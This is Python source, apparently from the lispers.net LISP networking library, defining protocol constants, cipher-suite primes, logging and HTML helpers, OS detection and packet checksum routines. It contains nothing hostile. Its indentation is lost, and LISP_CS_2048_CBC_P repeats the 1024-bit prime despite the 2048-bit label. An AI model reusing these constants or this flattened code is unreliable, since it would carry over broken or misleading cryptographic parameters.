lisp_ignore_df_bit = (os.getenv("LISP_IGNORE_DF_BIT") != None)
#------------------------------------------------------------------------------
#
# UDP ports used by LISP.
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
#
# Packet type definitions.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
#
# Map-Reply action values.
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
LISP_SEND_PUBSUB_ACTION = 6
lisp_map_reply_action_string = ["no-action", "native-forward",
"send-map-request", "drop-action", "policy-denied",
"auth-failure", "send-subscribe"]
#
# Various HMACs alg-ids and lengths (in bytes) used by LISP.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
#
# LCAF types as defined in draft-ietf-lisp-lcaf.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
#
# TTL constant definitions.
#
LISP_MR_TTL = (24*60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_MCAST_TTL = 15
LISP_IGMP_TTL = 240
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_TEST_MR_INTERVAL = 60 # In units of seconds, 1 minute
LISP_MAP_NOTIFY_INTERVAL = 2 # In units of seconds
LISP_DDT_MAP_REQUEST_INTERVAL = 2 # In units of seconds
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15 # In units of seconds
LISP_MAP_REQUEST_RATE_LIMIT = .5 # In units of seconds, 500 ms
LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME = 60 # In units of seconds, 1 minute
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1 # In units of seconds
LISP_RLOC_PROBE_TTL = 128
LISP_RLOC_PROBE_INTERVAL = 10 # In units of seconds
LISP_RLOC_PROBE_REPLY_WAIT = 15 # In units of seconds
LISP_DEFAULT_DYN_EID_TIMEOUT = 15 # In units of seconds
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180 # In units of seconds, 3 minutes
#
# Cipher Suites defined in RFC 8061:
#
# Cipher Suite 0:
# Reserved
#
# Cipher Suite 1 (LISP_2048MODP_AES128_CBC_SHA256):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 2 (LISP_EC25519_AES128_CBC_SHA256):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 3 (LISP_2048MODP_AES128_GCM):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 4 (LISP_3072MODP_AES128_GCM):
# Diffie-Hellman Group: 3072-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 5 (LISP_256_EC25519_AES128_GCM):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 6 (LISP_256_EC25519_CHACHA20_POLY1305):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: Chacha20-Poly1305 [CHACHA-POLY] [RFC7539]
# Integrity: Integrated with AEAD_CHACHA20_POLY1305 [CHACHA-POLY]
# IV length: 8 bytes
# KDF: HMAC-SHA-256
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
#------------------------------------------------------------------------------
#
# lisp_record_traceback
#
# Open ./logs/lisp-traceback.log file and write traceback info to it.
#
def lisp_record_traceback(*args):
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
fd = open("./logs/lisp-traceback.log", "a")
fd.write("---------- Exception occurred: {} ----------\n".format(ts))
try:
traceback.print_last(file=fd)
except:
fd.write("traceback.print_last(file=fd) failed")
#endtry
try:
traceback.print_last()
except:
print("traceback.print_last() failed")
#endtry
fd.close()
return
#enddef
#
# lisp_set_exception
#
# Set exception callback to call lisp.lisp_record_traceback().
#
def lisp_set_exception():
sys.excepthook = lisp_record_traceback
return
#enddef
#
# lisp_is_raspbian
#
# Return True if this system is running Raspbian on a Raspberry Pi machine.
#
def lisp_is_raspbian():
if (distro.linux_distribution()[0] != "debian"): return(False)
return(platform.machine() in ["armv6l", "armv7l"])
#enddef
#
# lisp_is_ubuntu
#
# Return True if this system is running Ubuntu Linux.
#
def lisp_is_ubuntu():
return(distro.linux_distribution()[0] == "Ubuntu")
#enddef
#
# lisp_is_fedora
#
# Return True if this system is running Fedora Linux.
#
def lisp_is_fedora():
return(distro.linux_distribution()[0] == "fedora")
#enddef
#
# lisp_is_centos
#
# Return True if this system is running CentOS Linux.
#
def lisp_is_centos():
return(distro.linux_distribution()[0] == "centos")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian.
#
def lisp_is_debian():
return(distro.linux_distribution()[0] == "debian")
#enddef
#
# lisp_is_debian_kali
#
# Return True if this system is running Kali Linux.
#
def lisp_is_debian_kali():
return(distro.linux_distribution()[0] == "Kali")
#enddef
#
# lisp_is_macos
#
# Return True if this system is running MacOS operating system.
#
def lisp_is_macos():
return(platform.uname()[0] == "Darwin")
#enddef
#
# lisp_is_alpine
#
# Return True if this system is running the Alpine Linux operating system.
#
def lisp_is_alpine():
return(os.path.exists("/etc/alpine-release"))
#enddef
#
# lisp_is_x86
#
# Return True if this process is an x86 little-endian machine.
#
def lisp_is_x86():
cpu = platform.machine()
return(cpu in ("x86", "i686", "x86_64"))
#enddef
#
# lisp_is_linux
#
# Return True if this system is running Linux.
#
def lisp_is_linux():
return(platform.uname()[0] == "Linux")
#enddef
#
# lisp_is_python2
#
# Return True if this code is running Python 2.7.x.
#
def lisp_is_python2():
ver = sys.version.split()[0]
return(ver[0:3] == "2.7")
#enddef
#
# lisp_is_python3
#
# Return True if this code is running Python 3.x.x.
#
def lisp_is_python3():
ver = sys.version.split()[0]
return(ver[0:2] == "3.")
#enddef
#
# lisp_on_aws
#
# Return True if this node is running in an Amazon VM on AWS.
#
def lisp_on_aws():
vm = getoutput("sudo dmidecode -s bios-vendor")
if (vm.find("command not found") != -1 and lisp_on_docker()):
aws = bold("AWS check", False)
lprint("{} - dmidecode not installed in docker container".format(aws))
#endif
return(vm.lower().find("amazon") != -1)
#enddef
#
# lisp_on_gcp
#
# Return True if this node is running in an Google Compute Engine VM.
#
def lisp_on_gcp():
vm = getoutput("sudo dmidecode -s bios-version")
return(vm.lower().find("google") != -1)
#enddef
#
# lisp_on_docker
#
# Are we in a docker container?
#
def lisp_on_docker():
return(os.path.exists("/.dockerenv"))
#enddef
#
# lisp_process_logfile
#
# Check to see if logfile exists. If not, it is startup time to create one
# or another procedure rotated the file out of the directory.
#
def lisp_process_logfile():
logfile = "./logs/lisp-{}.log".format(lisp_log_id)
if (os.path.exists(logfile)): return
sys.stdout.close()
sys.stdout = open(logfile, "a")
lisp_print_banner(bold("logfile rotation", False))
return
#enddef
#
# lisp_i_am
#
# The individual components tell the libraries who they are so we can prefix
# the component name for print() and logs().
#
def lisp_i_am(name):
global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
global lisp_hostname
lisp_log_id = name
if (name == "itr"): lisp_i_am_itr = True
if (name == "etr"): lisp_i_am_etr = True
if (name == "rtr"): lisp_i_am_rtr = True
if (name == "mr"): lisp_i_am_mr = True
if (name == "ms"): lisp_i_am_ms = True
if (name == "ddt"): lisp_i_am_ddt = True
if (name == "core"): lisp_i_am_core = True
#
# Set hostname to normalize dino-macbook.local or dino-macbook.wp.comcast.
# net to "dino-macbook".
#
lisp_hostname = socket.gethostname()
index = lisp_hostname.find(".")
if (index != -1): lisp_hostname = lisp_hostname[0:index]
return
#enddef
#
# lprint
#
# Print with timestamp and component name prefixed. If "force" is any argument,
# then we don't care about the lisp_debug_logging setting and a log message
# is issued.
#
def lprint(*args):
force = ("force" in args)
if (lisp_debug_logging == False and force == False): return
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print("{}: {}:".format(ts, lisp_log_id), end=" ")
for arg in args:
if (arg == "force"): continue
print(arg, end=" ")
#endfor
print()
try: sys.stdout.flush()
except: pass
return
#enddef
#
# fprint
#
# Do an lprint() even when debug logging is off: the "force" flag is
# supplied so the message still prints.
#
def fprint(*args):
nargs = args + ("force",)
lprint(*nargs)
return
#enddef
#
# dprint
#
# Data-plane logging. Call lprint() only if lisp.lisp_data_plane_logging is
# True.
#
def dprint(*args):
if (lisp_data_plane_logging): lprint(*args)
return
#enddef
#
# cprint
#
# Print the class instance.
#
def cprint(instance):
print("{}:".format(instance))
pprint.pprint(instance.__dict__)
#enddef
#
# debug
#
# Used for debugging. Used to find location of temporary "printf" code so it
# can be removed for production code.
#
def debug(*args):
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print(red(">>>", False), end=" ")
print("{}:".format(ts), end=" ")
for arg in args: print(arg, end=" ")
print(red("<<<\n", False))
try: sys.stdout.flush()
except: pass
return
#enddef
#
# lisp_print_caller
#
# Print out calling stack.
#
def lisp_print_caller():
fprint(traceback.print_last())
#enddef
#
# lisp_print_banner
#
# Print out startup and shutdown banner.
#
def lisp_print_banner(string):
global lisp_version, lisp_hostname
if (lisp_version == ""):
lisp_version = getoutput("cat lisp-version.txt")
#endif
hn = bold(lisp_hostname, False)
lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
datetime.datetime.now(), lisp_version, hn))
return
#enddef
#
# green
#
# For printing banner.
#
def green(string, html):
if (html): return('<font color="green"><b>{}</b></font>'.format(string))
return(bold("\033[92m" + string + "\033[0m", html))
#enddef
#
# green_last_sec
#
# For printing packets in the last 1 second.
#
def green_last_sec(string):
return(green(string, True))
#enddef
#
# green_last_minute
#
# For printing packets in the last 1 minute.
#
def green_last_min(string):
return('<font color="#58D68D"><b>{}</b></font>'.format(string))
#enddef
#
# red
#
# For printing banner.
#
def red(string, html):
if (html): return('<font color="red"><b>{}</b></font>'.format(string))
return(bold("\033[91m" + string + "\033[0m", html))
#enddef
#
# blue
#
# For printing distinguished-name AFIs.
#
def blue(string, html):
if (html): return('<font color="blue"><b>{}</b></font>'.format(string))
return(bold("\033[94m" + string + "\033[0m", html))
#enddef
#
# bold
#
# For printing banner.
#
def bold(string, html):
if (html): return("<b>{}</b>".format(string))
return("\033[1m" + string + "\033[0m")
#enddef
#
# convert_font
#
# Converts from text-based bold/color to HTML bold/color.
#
def convert_font(string):
escapes = [ ["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold] ]
right = "[0m"
for e in escapes:
left = e[0]
color = e[1]
offset = len(left)
index = string.find(left)
if (index != -1): break
#endfor
while (index != -1):
end = string[index::].find(right)
bold_string = string[index+offset:index+end]
string = string[:index] + color(bold_string, True) + \
string[index+end+offset::]
index = string.find(left)
#endwhile
#
# Call this function one more time if a color was in bold.
#
if (string.find("[1m") != -1): string = convert_font(string)
return(string)
#enddef
#
# lisp_space
#
# Put whitespace in URL encoded string.
#
def lisp_space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_button
#
# Return string of a LISP html button.
#
def lisp_button(string, url):
b = '<button style="background-color:transparent;border-radius:10px;" ' + \
'type="button">'
if (url == None):
html = b + string + "</button>"
else:
a = '<a href="{}">'.format(url)
s = lisp_space(2)
html = s + a + b + string + "</button></a>" + s
#endif
return(html)
#enddef
#
# lisp_print_cour
#
# Print in HTML Courier-New font.
#
def lisp_print_cour(string):
output = '<font face="Courier New">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_print_sans
#
# Print in HTML Sans-Serif font.
#
def lisp_print_sans(string):
output = '<font face="Sans-Serif">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_span
#
# Print out string when a pointer hovers over some text.
#
def lisp_span(string, hover_string):
output = '<span title="{}">{}</span>'.format(hover_string, string)
return(output)
#enddef
#
# lisp_eid_help_hover
#
# Create hover title for any input EID form.
#
def lisp_eid_help_hover(output):
eid_help_str = \
'''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# lisp_geo_help_hover
#
# Create hover title for any input Geo or EID form.
#
def lisp_geo_help_hover(output):
eid_help_str = \
'''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# space
#
# Put whitespace in URL encoded string.
#
def space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_get_ephemeral_port
#
# Select random UDP port for use of a source port in a Map-Request and
# destination port in a Map-Reply.
#
def lisp_get_ephemeral_port():
return(random.randrange(32768, 65535))
#enddef
#
# lisp_get_data_nonce
#
# Get a 24-bit random nonce to insert in data header.
#
def lisp_get_data_nonce():
return(random.randint(0, 0xffffff))
#enddef
#
# lisp_get_control_nonce
#
# Get a 64-bit random nonce to insert in control packets.
#
def lisp_get_control_nonce():
return(random.randint(0, (2**64)-1))
#enddef
#
# lisp_hex_string
#
# Take an integer, either 16, 32, or 64 bits in width and return a hex string.
# But don't return the leading "0x". And don't return a trailing "L" if the
# integer is a negative 64-bit value (high-order bit set).
#
def lisp_hex_string(integer_value):
value = hex(integer_value)[2::]
if (value[-1] == "L"): value = value[0:-1]
return(value)
#enddef
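#
# Examples (illustrative): lisp_hex_string(255) returns "ff" and
# lisp_hex_string(0xbeef) returns "beef" -- no leading "0x", no trailing "L".
#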
#
# lisp_get_timestamp
#
# Use time library to get a current timestamp.
#
def lisp_get_timestamp():
return(time.time())
#enddef
lisp_uptime = lisp_get_timestamp()
#
# lisp_set_timestamp
#
# Use time library to set time into the future.
#
def lisp_set_timestamp(seconds):
return(time.time() + seconds)
#enddef
#
# lisp_print_elapsed
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_elapsed(ts):
if (ts == 0 or ts == None): return("never")
elapsed = time.time() - ts
elapsed = round(elapsed, 0)
return(str(datetime.timedelta(seconds=elapsed)))
#enddef
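#
# Example (illustrative): for a timestamp taken 90 seconds ago this returns
# "0:01:30"; a ts of 0 or None returns "never".
#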
#
# lisp_print_future
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_future(ts):
if (ts == 0): return("never")
future = ts - time.time()
if (future < 0): return("expired")
future = round(future, 0)
return(str(datetime.timedelta(seconds=future)))
#enddef
#
# lisp_print_eid_tuple
#
# Prints in html or returns a string of the following combinations:
#
# [<iid>]<eid>/<ml>
# <eid>/<ml>
# ([<iid>]<source-eid>/ml, [<iid>]<group>/ml)
#
# This is called by most of the data structure classes as "print_eid_tuple()".
#
def lisp_print_eid_tuple(eid, group):
eid_str = eid.print_prefix()
if (group.is_null()): return(eid_str)
group_str = group.print_prefix()
iid = group.instance_id
if (eid.is_null() or eid.is_exact_match(group)):
index = group_str.find("]") + 1
return("[{}](*, {})".format(iid, group_str[index::]))
#endif
sg_str = eid.print_sg(group)
return(sg_str)
#enddef
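#
# Example (illustrative): a unicast EID prints as "[1000]10.0.0.0/8"; with
# group [1000]224.1.1.0/24 and a null (or equal) source it prints as
# "[1000](*, 224.1.1.0/24)".
#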
#
# lisp_convert_6to4
#
# IPC messages will store an IPv4 address in an IPv6 "::ffff:<ipv4-addr>"
# format since we have a udp46 tunnel open. Convert it to an IPv4 address.
#
def lisp_convert_6to4(addr_str):
if (addr_str.find("::ffff:") == -1): return(addr_str)
addr = addr_str.split(":")
return(addr[-1])
#enddef
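#
# Example (illustrative): lisp_convert_6to4("::ffff:10.1.1.1") returns
# "10.1.1.1", while lisp_convert_6to4("fd00::1") is returned unchanged.
#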
#
# lisp_convert_4to6
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
# Returns a lisp_address().
#
def lisp_convert_4to6(addr_str):
addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
addr.store_address(addr_str)
return(addr)
#enddef
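#
# Example (a sketch): lisp_convert_4to6("10.1.1.1") returns a lisp_address()
# that stores "::ffff:10.1.1.1"; an IPv6 input string is stored as given.
#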
#
# lisp_gethostbyname
#
# Return an address if string is a name or address. If socket.gethostbyname()
# fails, try socket.getaddrinfo(). We may be running on Alpine Linux which
# doesn't return DNS names with gethostbyname().
#
def lisp_gethostbyname(string):
ipv4 = string.split(".")
ipv6 = string.split(":")
mac = string.split("-")
if (len(ipv4) == 4):
if (ipv4[0].isdigit() and ipv4[1].isdigit() and ipv4[2].isdigit() and
ipv4[3].isdigit()): return(string)
#endif
if (len(ipv6) > 1):
try:
int(ipv6[0], 16)
return(string)
except:
pass
#endtry
#endif
#
# Make sure there are hex digits between dashes, otherwise could be a
# valid DNS name with dashes.
#
if (len(mac) == 3):
for i in range(3):
try: int(mac[i], 16)
except: break
#endfor
#endif
try:
addr = socket.gethostbyname(string)
return(addr)
except:
if (lisp_is_alpine() == False): return("")
#endtry
#
# Try different approach on Alpine.
#
try:
addr = socket.getaddrinfo(string, 0)[0]
if (addr[3] != string): return("")
addr = addr[4][0]
except:
addr = ""
#endtry
return(addr)
#enddef
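#
# Examples (illustrative): lisp_gethostbyname("192.168.1.1") and
# lisp_gethostbyname("fe80::1") return the literal unchanged; a DNS name
# such as "map-server.example.com" is resolved, and "" is returned when
# resolution fails.
#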
#
# lisp_ip_checksum
#
# Input to this function is 20-bytes in packed form. Calculate IP header
# checksum and place in byte 10 and byte 11 of header.
#
def lisp_ip_checksum(data, hdrlen=20):
if (len(data) < hdrlen):
lprint("IPv4 packet too short, length {}".format(len(data)))
return(data)
#endif
ip = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, hdrlen*2, 4):
checksum += int(ip[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
ip = data[0:10] + checksum + data[12::]
return(ip)
#enddef
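#
# Usage sketch (illustrative, not from the original call sites): build a
# 20-byte IPv4 header with a zeroed checksum field and overwrite it:
#
# >>> hdr = struct.pack("!BBHHHBBH", 0x45, 0, 20, 0, 0, 64, 17, 0) + \
# ... socket.inet_aton("10.0.0.1") + socket.inet_aton("10.0.0.2")
# >>> hdr = lisp_ip_checksum(hdr)
#
# Bytes 10 and 11 of the returned buffer then hold the header checksum.
#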
#
# lisp_icmp_checksum
#
# Checksum an ICMP Destination Unreachable Too Big message. It will statically
# checksum 36 bytes.
#
def lisp_icmp_checksum(data):
if (len(data) < 36):
lprint("ICMP packet too short, length {}".format(len(data)))
return(data)
#endif
icmp = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 36, 4):
checksum += int(icmp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 2 and 3.
#
checksum = struct.pack("H", checksum)
icmp = data[0:2] + checksum + data[4::]
return(icmp)
#enddef
#
# lisp_udp_checksum
#
# Calculate the UDP pseudo header checksum. The variable 'data' is a UDP
# packet buffer starting with the UDP header with the checksum field zeroed.
#
# What is returned is the UDP packet buffer with a non-zero/computed checksum.
#
# The UDP pseudo-header is prepended to the UDP packet buffer which the
# checksum runs over:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Source Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Destination Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Upper-Layer Packet Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | zero | Next Header |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_udp_checksum(source, dest, data):
#
# Build pseudo-header for IPv6.
#
s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
udplen = socket.htonl(len(data))
next_header = socket.htonl(LISP_UDP_PROTOCOL)
pheader = s.pack_address()
pheader += d.pack_address()
pheader += struct.pack("II", udplen, next_header)
#
# Append UDP packet to pseudo-header. Add zeros to make 4 byte aligned.
#
udp = binascii.hexlify(pheader + data)
add = len(udp) % 4
for i in range(0,add): udp += "0"
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, len(udp), 4):
checksum += int(udp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at last 2 bytes of UDP header.
#
checksum = struct.pack("H", checksum)
udp = data[0:6] + checksum + data[8::]
return(udp)
#enddef
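#
# Usage sketch (illustrative): 'source' and 'dest' are IPv6 address strings
# (use the "::ffff:<ipv4>" form for IPv4) and 'data' is the UDP header plus
# payload with a zeroed checksum field; the buffer is returned with bytes
# 6 and 7 of the UDP header filled in.
#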
#
# lisp_igmp_checksum
#
# Compute IGMP checksum. This is specialized for an IGMP query 12-byte
# header.
#
def lisp_igmp_checksum(igmp):
g = binascii.hexlify(igmp)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 24, 4):
checksum += int(g[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 2 and 3.
#
checksum = struct.pack("H", checksum)
igmp = igmp[0:2] + checksum + igmp[4::]
return(igmp)
#enddef
#
# lisp_get_interface_address
#
# Based on supplied interface device, return IPv4 local interface address.
#
def lisp_get_interface_address(device):
#
# Check for illegal device name.
#
if (device not in netifaces.interfaces()): return(None)
#
# Check if there are no IPv4 addresses assigned to interface.
#
addresses = netifaces.ifaddresses(device)
if (netifaces.AF_INET not in addresses): return(None)
#
# Find first private address.
#
return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)
for addr in addresses[netifaces.AF_INET]:
addr_str = addr["addr"]
return_address.store_address(addr_str)
if (return_address.is_private_address()): return(return_address) # return the first private address, per the comment above
#endfor
return(None)
#enddef
#
# lisp_get_input_interface
#
# Based on destination-MAC address of incoming pcap'ed packet, index into
# lisp_mymacs{} to get a interface name string (device name) for all
# interfaces that have the MAC address assigned.
#
# If dest-MAC is not us, look at source MAC to see if we are in a loopback
# situation testing application and xTR in the same system.
#
def lisp_get_input_interface(packet):
p = lisp_format_packet(packet[0:12])
macs = p.replace(" ", "")
da = macs[0:12]
sa = macs[12::]
try: my_sa = (sa in lisp_mymacs)
except: my_sa = False
if (da in lisp_mymacs): return(lisp_mymacs[da], sa, da, my_sa)
if (my_sa): return(lisp_mymacs[sa], sa, da, my_sa)
return(["?"], sa, da, my_sa)
#enddef
#
# lisp_get_local_interfaces
#
# Go populate the lisp.myinterfaces{} dictionary array. Key is device ID
# returned by the netifaces API.
#
def lisp_get_local_interfaces():
for device in netifaces.interfaces():
interface = lisp_interface(device)
interface.add_interface()
#endfor
return
#enddef
#
# lisp_get_loopback_address
#
# Get first loopback address on device lo which is not 127.0.0.1.
#
def lisp_get_loopback_address():
for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
if (addr["peer"] == "127.0.0.1"): continue
return(addr["peer"])
#endfor
return(None)
